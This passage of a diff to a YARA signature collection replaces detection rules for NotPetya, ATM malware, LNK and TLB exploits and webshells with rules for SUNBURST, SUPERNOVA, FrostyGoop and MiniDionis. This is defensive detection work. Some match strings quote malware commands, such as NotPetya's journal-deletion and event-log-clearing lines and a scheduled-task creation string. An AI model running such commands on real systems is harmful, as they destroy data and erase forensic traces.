+		$s3 = "new ActiveXObject('MSXML2.XMLHTTP');" ascii
 
 	condition:
-		$xc1 or 2 of ( $sx* ) or 4 of them or ( uint16( 0 ) == 0x5a4d and filesize <= 3000KB and 2 of them )
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_ATM_Malware_Loup_1 : FILE
+
+rule SIGNATURE_BASE_SUSP_Xored_URL_In_EXE : FILE
 {
 	meta:
-		description = "Detects ATM Malware Loup"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "2215a93f-d854-5f9b-b5cd-53962c45db08"
-		date = "2020-08-17"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_loup.yar#L3-L19"
+		description = "Detects an XORed URL in an executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f83991c8-f2d9-5583-845a-d105034783ab"
+		date = "2020-03-09"
+		modified = "2022-09-16"
+		reference = "https://twitter.com/stvemillertime/status/1237035794973560834"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_xor.yar#L4-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
-		logic_hash = "5068c3f27cf821f512fb9a473d2bd45066d550f30fbc26f0cbebbe103e6f4ccb"
-		score = 75
+		logic_hash = "2113324ae04a9022be4cf5c615ad231206eeefb5aa87a2236ec3c9deee9e7ec2"
+		score = 50
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii
-		$String2 = "CurrencyDispenser1" ascii
-		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
+		$s1 = "http://" xor
+		$s2 = "https://" xor
+		$f1 = "http://" ascii
+		$f2 = "https://" ascii
+		$fp01 = "3Com Corporation" ascii
+		$fp02 = "bootloader.jar" ascii
+		$fp03 = "AVAST Software" ascii wide
+		$fp04 = "smartsvn" wide ascii fullword
+		$fp05 = "Avira Operations GmbH" wide fullword
+		$fp06 = "Perl Dev Kit" wide fullword
+		$fp07 = "Digiread" wide fullword
+		$fp08 = "Avid Editor" wide fullword
+		$fp09 = "Digisign" wide fullword
+		$fp10 = "Microsoft Corporation" wide fullword
+		$fp11 = "Microsoft Code Signing" ascii wide
+		$fp12 = "XtraProxy" wide fullword
+		$fp13 = "A Sophos Company" wide
+		$fp14 = "http://crl3.digicert.com/" ascii
+		$fp15 = "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl" ascii
+		$fp16 = "HitmanPro.Alert" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( ( $s1 and #s1 > #f1 ) or ( $s2 and #s2 > #f2 ) ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_Notpetya_Ransomware_Jun17 : FILE
+rule SIGNATURE_BASE_MAL_Go_Modbus_Jul24_1 : FILE
 {
 	meta:
-		description = "Detects new NotPetya Ransomware variant from June 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8805f971-0680-534d-9955-65dc4ecc934a"
-		date = "2017-06-27"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/h6iaGj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nopetya_jun17.yar#L12-L41"
+		description = "Detects characteristics reported by Dragos for FrostyGoop ICS malware"
+		author = "Florian Roth"
+		id = "4a1e6bbe-d743-5394-b207-e417b64fa76d"
+		date = "2024-07-23"
+		modified = "2024-07-24"
+		reference = "https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_go_modbus.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e49fd918e9cc09a60434e62767794cd908f195cb71fd7a752a2b4802973bc92e"
+		logic_hash = "d992c8159deca0ed2b2a33da3c31fdf0efa9a09ba941d059fa7fc1bad458aed1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
-		hash2 = "45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0"
-		hash3 = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
+		hash1 = "5d2e4fd08f81e3b2eb2f3eaae16eb32ae02e760afc36fa17f4649322f6da53fb"
 
 	strings:
-		$x1 = "Ooops, your important files are encrypted." fullword wide ascii
-		$x2 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 " fullword wide
-		$x3 = "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 " fullword wide
-		$x4 = "Send your Bitcoin wallet ID and personal installation key to e-mail " fullword wide
-		$x5 = "fsutil usn deletejournal /D %c:" fullword wide
-		$x6 = "wevtutil cl Setup & wevtutil cl System" ascii
-		$x7 = { 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E
-         00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 }
-		$s1 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" " fullword wide
-		$s4 = "\\\\.\\pipe\\%ws" fullword wide
-		$s5 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d" fullword wide
-		$s6 = "u%s \\\\%s -accepteula -s " fullword wide
-		$s7 = "dllhost.dat" fullword wide
+		$a1 = "Go build"
+		$sa1 = "github.com/rolfl/modbus"
+		$sb1 = "main.TaskList.executeCommand"
+		$sb2 = "main.TargetList.getTargetIpList"
+		$sb3 = "main.TaskList.getTaskIpList"
+		$sb4 = "main.CycleInfo" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		filesize < 30MB and ( $sa1 and 3 of ( $sb* ) ) or 4 of them
 }
-rule SIGNATURE_BASE_EXPL_Exploit_TLB_Scripts : FILE
+rule SIGNATURE_BASE_Minidionis_Readerview : FILE
 {
 	meta:
-		description = "Detects malicious TLB files which may be delivered via Visual Studio projects"
-		author = "Rich Warren (slightly modified by Florian Roth)"
-		id = "5151458e-4c30-50ff-a39e-e5b5b68b87aa"
-		date = "2021-01-26"
+		description = "MiniDionis Malware - file readerView.exe / adobe.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc8d4311-2a87-5c9b-95ff-52708f293f01"
+		date = "2015-07-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/outflanknl/Presentations/blob/master/Nullcon2020_COM-promise_-_Attacking_Windows_development_environments.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_tlb_scripts.yar#L2-L19"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L10-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39bf626d60a867d054762043f74e86998d6848439655f84be72003c112db9953"
+		logic_hash = "45ae1be675f2b7b3d89aea2bde66f9f96b55b6fbf81e3783c209c7d6d4355026"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
 
 	strings:
-		$a = ".sct" ascii nocase
-		$b = "script:" ascii nocase
-		$c = "scriptlet:" ascii nocase
-		$d = "soap:" ascii nocase
-		$e = "winmgmts:" ascii nocase
+		$s1 = "%ws_out%ws" fullword wide
+		$s2 = "dnlibsh" fullword ascii
+		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
+		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
+		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
 
 	condition:
-		uint32be( 0 ) == 0x4D534654 and filesize < 100KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_EXT_EXPL_ZTH_LNK_EXPLOIT_A : FILE
+rule SIGNATURE_BASE_Malicious_SFX1 : FILE
 {
 	meta:
-		description = "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373."
-		author = "Peter Girnus"
-		id = "14788504-64e3-533b-ad21-00a3462a33cc"
-		date = "2025-03-18"
-		modified = "2025-03-29"
-		reference = "https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_lnk_zdi_can_25373.yar#L1-L23"
+		description = "SFX with voicemail content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7c29dfb0-bbed-5017-80b4-a5c44024cd70"
+		date = "2015-07-20"
+		modified = "2023-12-05"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L39-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b2c6a7f0abd62d3eef916352f984d1fcc721cfba4f5de9d159de8fd428c02b31"
+		hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
+		logic_hash = "fd7b4c504a52e68fe87eeb9f7066c61ddc47257ac9324a60d219c022d3affbbf"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$spoof_a = {20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00}
-		$spoof_b = {09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00}
-		$spoof_c = {0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00}
-		$spoof_d = {0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00}
-		$spoof_e = {11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00}
-		$spoof_f = {12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00}
-		$spoof_g = {13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00}
-		$spoof_h = {0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00}
+		$s0 = "voicemail" ascii
+		$s1 = ".exe" ascii
 
 	condition:
-		uint32( 0 ) == 0x4C and uint32( 4 ) == 0x21401 and any of ( $spoof_* )
+		uint16( 0 ) == 0x4b50 and filesize < 1000KB and $s0 in ( 3 .. 80 ) and $s1 in ( 3 .. 80 )
 }
-rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_2 : FILE
+rule SIGNATURE_BASE_Malicious_SFX2 : FILE
 {
 	meta:
-		description = "Detection for the z_webshell"
-		author = "DHS NCCIC Hunt and Incident Response Team"
-		id = "9a54925f-de10-567f-a1ea-5e7522b47dfd"
-		date = "2018-01-25"
+		description = "SFX with adobe.exe content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff59d638-4d82-5a14-b346-3df2154d3c34"
+		date = "2015-07-20"
 		modified = "2023-12-05"
-		old_rule_name = "z_webshell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_074A.yar#L9-L24"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L55-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2c9095c965a55efc46e16b86f9b7d6c6"
-		logic_hash = "d41aa107e54af5d45531a46d24b24f9f14635dbcb50ed26f7c787883854f961f"
+		hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
+		logic_hash = "a2ed7660604ff3c9f2d0dbb454f5d168cd61d1d5e647b5c74fe24f25ebb3dbfd"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$webshell_name = "public string z_progname =" nocase ascii wide
-		$webshell_password = "public string Password =" nocase ascii wide
+		$s1 = "adobe.exe" fullword ascii
+		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+		$s3 = "GETPASSWORD1" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x2040253c or uint32( 0 ) == 0x7073613c ) and filesize < 100KB and 2 of ( $webshell_* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_TA18_074A_Screen : FILE
+rule SIGNATURE_BASE_Minidionis_VBS_Dropped : FILE
 {
 	meta:
-		description = "Detects malware mentioned in TA18-074A"
+		description = "Dropped File - 1.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "789ee5e5-83c3-5137-a078-ff230dbf8fcd"
-		date = "2018-03-16"
+		id = "f0116861-4216-504a-a39b-463e7535a2b3"
+		date = "2015-07-21"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_074A.yar#L34-L51"
+		reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L72-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e96f70e3d9c7ff5812724111788365c47e2b478a35b39771c12a3d3636a6a020"
+		hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
+		logic_hash = "a24fe4cdff6dd7951af10710eb63ab1fd90ab0e43bbce4388d6687abac206da5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$s1 = "screen.exe" fullword wide
-		$s2 = "PlatformInvokeUSER32" fullword ascii
-		$s3 = "GetDesktopImageF" fullword ascii
-		$s4 = "PlatformInvokeGDI32" fullword ascii
-		$s5 = "Too many arguments, going to store in current dir" fullword wide
+		$s1 = "Wscript.Sleep 5000" ascii
+		$s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
+		$s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
+		$s4 = "If(FSO.FileExists(\"" ascii
+		$s5 = "then FSO.DeleteFile(\".\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them
+		filesize < 1KB and all of them and $s1 in ( 0 .. 40 )
 }
-rule SIGNATURE_BASE_TA18_074A_Scripts : FILE
+rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_1
 {
 	meta:
-		description = "Detects malware mentioned in TA18-074A"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4c786098-c5f4-529b-8732-03183dfa94b5"
-		date = "2018-03-16"
-		modified = "2022-08-18"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_074A.yar#L53-L67"
+		description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
+		author = "FireEye"
+		id = "74b44844-5575-53d7-819b-ab1b2327a144"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L6-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "888ddd59b388033604474fc008f830159a9a104683fb052e7497b83118cbb8aa"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
+		logic_hash = "1fc006dead2fd540717e00e468bf30f37bdb1d061a805e33683e4a77db7f9156"
+		score = 85
+		quality = 77
+		tags = ""
 
 	strings:
-		$s1 = "Running -s cmd /c query user on " ascii
+		$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
+		$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
+		$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
+		$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
+		$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
+		$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
+		$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
+		$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
+		$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
 
 	condition:
-		filesize < 600KB and 1 of them
+		$fnv_xor and ( $cmd_regex_encoded or $cmd_regex_plain ) or ( ( $fake_orion_event_encoded or $fake_orion_event_plain ) and ( $fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain ) and ( $fake_orion_message_encoded and $fake_orion_message_plain ) )
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_1 : FILE
+rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_2
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1395509a-72f5-56c0-895c-3e9f15829de1"
-		date = "2018-02-22"
+		description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
+		author = "FireEye"
+		id = "329071d5-c9c6-5ae1-a514-aea9f4037bac"
+		date = "2020-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L13-L30"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L28-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "22d799531986c30da19943f1dda305e61a305083478549e93c0ecddeade77b39"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
+		logic_hash = "2bf0697b110bca88f712cbccaf0d2ba614d6093d6d9595659aefe088848d3826"
+		score = 85
+		quality = 83
+		tags = ""
 
 	strings:
-		$s1 = "Pipetp" fullword ascii
-		$s2 = "EStOpnabn" fullword ascii
+		$a = "0y3Kzy8BAA==" wide
+		$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
+		$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
+		$ac = "C88sSs1JLS4GAA==" wide
+		$ad = "C/UEAA==" wide
+		$ae = "C89MSU8tKQYA" wide
+		$af = "8wvwBQA=" wide
+		$ag = "cyzIz8nJBwA=" wide
+		$ah = "c87JL03xzc/LLMkvysxLBwA=" wide
+		$ai = "88tPSS0GAA==" wide
+		$aj = "C8vPKc1NLQYA" wide
+		$ak = "88wrSS1KS0xOLQYA" wide
+		$al = "c87PLcjPS80rKQYA" wide
+		$am = "Ky7PLNAvLUjRBwA=" wide
+		$an = "06vIzQEA" wide
+		$b = "0y3NyyxLLSpOzIlPTgQA" wide
+		$c = "001OBAA=" wide
+		$d = "0y0oysxNLKqMT04EAA==" wide
+		$e = "0y3JzE0tLknMLQAA" wide
+		$f = "003PyU9KzAEA" wide
+		$h = "0y1OTS4tSk1OBAA=" wide
+		$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
+		$j = "c8rPSQEA" wide
+		$k = "c8rPSfEsSczJTAYA" wide
+		$l = "c60oKUp0ys9JAQA=" wide
+		$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
+		$n = "8yxJzMlMBgA=" wide
+		$o = "88lMzygBAA==" wide
+		$p = "88lMzyjxLEnMyUwGAA==" wide
+		$q = "C0pNL81JLAIA" wide
+		$r = "C07NzXTKz0kBAA==" wide
+		$s = "C07NzXTKz0nxLEnMyUwGAA==" wide
+		$t = "yy9IzStOzCsGAA==" wide
+		$u = "y8svyQcA" wide
+		$v = "SytKTU3LzysBAA==" wide
+		$w = "C84vLUpOdc5PSQ0oygcA" wide
+		$x = "C84vLUpODU4tykwLKMoHAA==" wide
+		$y = "C84vLUpO9UjMC07MKwYA" wide
+		$z = "C84vLUpO9UjMC04tykwDAA==" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "169d4237c79549303cca870592278f42" or all of them )
+		($a and $b and $c and $d and $e and $f and $h and $i ) or ( $j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ( $aa or $ab ) ) or ( $t and $u and $v and $w and $x and $y and $z and ( $aa or $ab ) ) or ( $ac and $ad and $ae and $af and $ag and $ah and ( $am or $an ) ) or ( $ai and $aj and $ak and $al and ( $am or $an ) )
 }
 
-rule SIGNATURE_BASE_Turlamosquito_Mal_2 : FILE
+rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_1 : FILE
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d23d9fe1-26e3-5012-8a88-61ebbc3fbd8f"
-		date = "2018-02-22"
+		description = "SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args). This rule is looking for specific strings and attributes related to SUPERNOVA."
+		author = "FireEye"
+		id = "73a27fa2-a846-5f4b-8182-064ac06c71a8"
+		date = "2020-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L32-L52"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L80-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f1f93d3bc1c4bd55fc7558716a0a1eb7a6c4c2381a4532d37f4e3559f7c809ea"
-		score = 75
-		quality = 85
+		logic_hash = "8471e6b3675e7e9ccfe5b81ab4c599668f2de528f3b179a675f50aa1fd7814b2"
+		score = 85
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
-		hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
 
 	strings:
-		$s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii
-		$s3 = "no_address" fullword wide
-		$s6 = "SRRRQP" fullword ascii
-		$s7 = "QWVPQQ" fullword ascii
+		$compile1 = "CompileAssemblyFromSource"
+		$compile2 = "CreateCompiler"
+		$context = "ProcessRequest"
+		$httpmodule = "IHttpHandler" ascii
+		$string1 = "clazz"
+		$string2 = "//NetPerfMon//images//NoLogo.gif" wide
+		$string3 = "SolarWinds" ascii nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "cd918073f209c5da7a16b6c125d73746" or all of them )
